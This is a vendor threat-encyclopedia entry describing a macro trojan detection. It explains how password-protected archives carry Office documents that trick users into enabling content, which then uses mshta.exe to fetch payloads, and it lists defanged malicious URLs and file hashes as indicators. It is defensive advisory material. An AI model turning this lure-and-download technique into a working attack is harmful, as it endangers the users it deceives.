MSOffice/PasswordProtected.B3CF!tr

description-logoAnalysis

MSOffice/PasswordProtected.B3CF!tr is a generic detection for a trojan.
Since this is a generic detection, malware that are detected as MSOffice/PasswordProtected.B3CF!tr may have varying behaviour.
Below are some of its observed characteristics/behaviours:

  • This malware arrives as a password protected archive containing a MS document. The password to the archive is approximately 3-6 digits in length. Upon opening the document, there will be an image in the file declaring the document as protected and asking the user to enable editing/content to allow macros. If an unsuspecting user clicks "Enable Content" it risks executing further the malware and will automatically utilize mshta.exe to try to connect to a malicious domain, potentially downloading further components/payload of the attack.

  • Below are images of the malicious document:

    • Figure 1: Before enabling editing/content.


    • Figure 2: After enabling editing/content.


    • Figure 3: Utilizing mshta.exe.


  • Below are some of the sites associated with the trojan:
    • http://91.2[removed]as/se.html
    • http://91.2[removed]nn/se.html
    • http://91.2[removed]aa/se.html

  • Following are some of the exact IOCs/file hash associated with this detection:
    • Md5: 24b8882db00b8d6ea8c3329f61daf0eb
      Sha256: 5da7512c9c02a5b925a6a0361ad916e64f17a0552db9db6daaf67411648806c6
    • Md5: b578993556e27105217ccf8ff80f5743
      Sha256: d5fcc40fd1a826e3c2ab64a095ab8af23bf271bc43e27b4e1d0513f1e4dbb4b1
    • Md5: ed6c70dc6d0ea14cb10594deeaa7637c
      Sha256: 3125aad3f74065c8dcdc25ab27824af7fb93f7c71786684c199b1e1a46162ad4
    • Md5: feef1789c4d1f22a7f5c846a6d62d22f
      Sha256: d61257109f48fc61a9ce683320b4e3e84eb5698e729c5658596af238111473ac
    • Md5: 2639abb3c078e563b7123f395522c68b
      Sha256: 5689384baac7a92c1c8a45ec1e3864c57b1616c3c93f735fb5aa1d9f8b1880e4
    • Md5: 4ff31812b3b44885b15941a23be9e47a
      Sha256: c3ce3a92b6f7ba8998cde3d35455a8bd610b8f70b4527a06268755ec7783098c

recommended-action-logoRecommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
FortiClient
FortiAPS
FortiAPU
FortiMail
FortiSandbox
FortiWeb
Web Application Firewall
FortiIsolator
FortiDeceptor
FortiEDR

Version Updates

Date Version Detail
2023-03-07 91.01211
2022-08-09 90.04916
2022-04-05 90.01122
2022-02-10 89.09511
2022-02-10 89.09505